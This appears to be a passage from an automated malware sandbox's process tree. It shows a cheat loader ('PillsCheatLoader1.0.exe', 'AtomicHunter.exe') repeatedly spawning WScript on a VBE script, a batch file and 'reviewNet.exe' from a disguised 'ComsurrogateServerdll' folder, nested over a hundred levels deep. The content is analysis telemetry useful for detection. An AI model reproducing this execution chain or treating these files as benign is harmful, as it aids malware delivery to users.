C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"113⤵PID:6476
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"114⤵PID:4568
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "115⤵PID:7448
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"116⤵PID:7488
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"113⤵PID:1876
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"112⤵PID:2184
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"113⤵PID:3188
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "114⤵PID:7288
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"115⤵PID:7324
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"112⤵PID:4260
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"111⤵PID:2448
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"112⤵PID:4988
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "113⤵PID:7260
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"114⤵PID:7332
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"110⤵PID:6872
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"111⤵PID:5596
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "112⤵PID:6512
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"113⤵PID:4600
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"110⤵PID:7912
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"109⤵PID:3236
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"110⤵PID:4720
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "111⤵PID:6752
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"112⤵PID:4688
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"109⤵PID:7936
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"108⤵PID:4504
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"109⤵PID:5700
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "110⤵PID:4860
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"111⤵PID:1756
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"108⤵PID:1988
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"107⤵PID:2556
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"108⤵PID:6128
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "109⤵PID:6604
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"110⤵PID:6128
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"107⤵PID:3316
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"106⤵PID:2248
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"107⤵PID:5220
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "108⤵PID:2692
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"109⤵PID:6984
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"106⤵PID:8000
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"105⤵PID:3752
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"106⤵PID:5044
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "107⤵PID:1884
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"108⤵PID:6240
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"105⤵PID:5644
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"104⤵PID:5516
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"105⤵PID:2692
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "106⤵PID:5680
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"107⤵PID:2440
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"104⤵PID:4296
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"103⤵PID:6412
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"104⤵PID:6888
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "105⤵PID:5828
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"106⤵PID:3148
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"103⤵PID:3376
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"102⤵PID:4520
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"103⤵PID:288
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "104⤵PID:4976
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"105⤵PID:5144
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"102⤵PID:2164
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"101⤵PID:3452
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"102⤵PID:6432
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "103⤵PID:6696
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"104⤵PID:2988
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"101⤵PID:7596
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"100⤵PID:4268
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"101⤵PID:6268
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "102⤵PID:7160
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"103⤵PID:4960
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"100⤵PID:4412
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"99⤵PID:2588
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"100⤵PID:3868
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "101⤵PID:3708
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"102⤵PID:5696
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"99⤵PID:3008
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"98⤵PID:2832
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"99⤵PID:1080
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "100⤵PID:4212
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"101⤵PID:3616
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"98⤵PID:7512
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"97⤵PID:3924
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"98⤵PID:4384
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "99⤵PID:6904
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"100⤵PID:3680
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"96⤵PID:2692
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"97⤵PID:3204
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "98⤵PID:3292
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"99⤵PID:5896
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"96⤵PID:1608
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"95⤵PID:952
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"96⤵PID:5696
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "97⤵PID:4840
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"98⤵PID:444
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"95⤵PID:6816
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"94⤵PID:5500
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"95⤵PID:5760
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "96⤵PID:3740
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"97⤵PID:2740
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"94⤵PID:7864
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"93⤵PID:6744
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"94⤵PID:6060
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "95⤵PID:5048
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"96⤵PID:5948
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"93⤵PID:2308
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"92⤵PID:4012
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"93⤵PID:6512
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "94⤵PID:5360
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"95⤵PID:6232
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"91⤵PID:5780
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"92⤵PID:6192
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "93⤵PID:6100
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"94⤵PID:2940
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"91⤵PID:4948
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"90⤵PID:5524
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"91⤵PID:3096
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "92⤵PID:3008
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"93⤵PID:4084
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"89⤵PID:4152
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"90⤵PID:2712
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "91⤵PID:5792
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"92⤵PID:5744
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"88⤵PID:4976
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"89⤵PID:5512
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "90⤵PID:6436
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"91⤵PID:6704
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"88⤵PID:4244
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"87⤵PID:6604
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"88⤵PID:7112
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "89⤵PID:1708
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"90⤵PID:5352
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"86⤵PID:4412
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"87⤵PID:6812
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "88⤵PID:5424
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"89⤵PID:4476
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"86⤵PID:7004
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"85⤵PID:2796
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"86⤵PID:5972
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "87⤵PID:1980
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"88⤵PID:2628
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"85⤵PID:2564
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"84⤵PID:3500
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"85⤵PID:5440
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "86⤵PID:3724
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"87⤵PID:5780
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"84⤵PID:7880
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"83⤵PID:908
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"84⤵PID:5132
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "85⤵PID:6416
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"86⤵PID:3796
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"83⤵PID:7940
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"82⤵PID:3376
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"83⤵PID:3204
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "84⤵PID:5672
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"85⤵PID:4360
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"82⤵PID:1560
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"81⤵PID:1800
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"82⤵PID:3856
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "83⤵PID:4860
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"84⤵PID:5404
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"81⤵PID:2896
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"80⤵PID:5112
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"81⤵PID:4868
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "82⤵PID:3080
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"83⤵PID:628
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"80⤵PID:3392
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"79⤵PID:7140
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"80⤵PID:288
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "81⤵PID:5904
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"82⤵PID:4904
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"78⤵PID:2572
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"79⤵PID:2924
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "80⤵PID:320
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"81⤵PID:6096
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"77⤵PID:5744
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"78⤵PID:924
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "79⤵PID:4280
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"80⤵PID:1884
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"76⤵PID:4844
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"77⤵PID:3036
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "78⤵PID:4876
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"79⤵PID:4296
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"75⤵PID:6412
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"76⤵PID:3764
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "77⤵PID:5988
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"78⤵PID:5848
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"74⤵PID:3944
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"75⤵PID:6096
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "76⤵PID:3592
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"77⤵PID:4992
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"73⤵PID:3684
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"74⤵PID:5692
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "75⤵PID:6792
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"76⤵PID:5656
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"72⤵PID:6252
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"73⤵PID:6088
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "74⤵PID:6840
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"75⤵PID:4260
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"71⤵PID:996
-
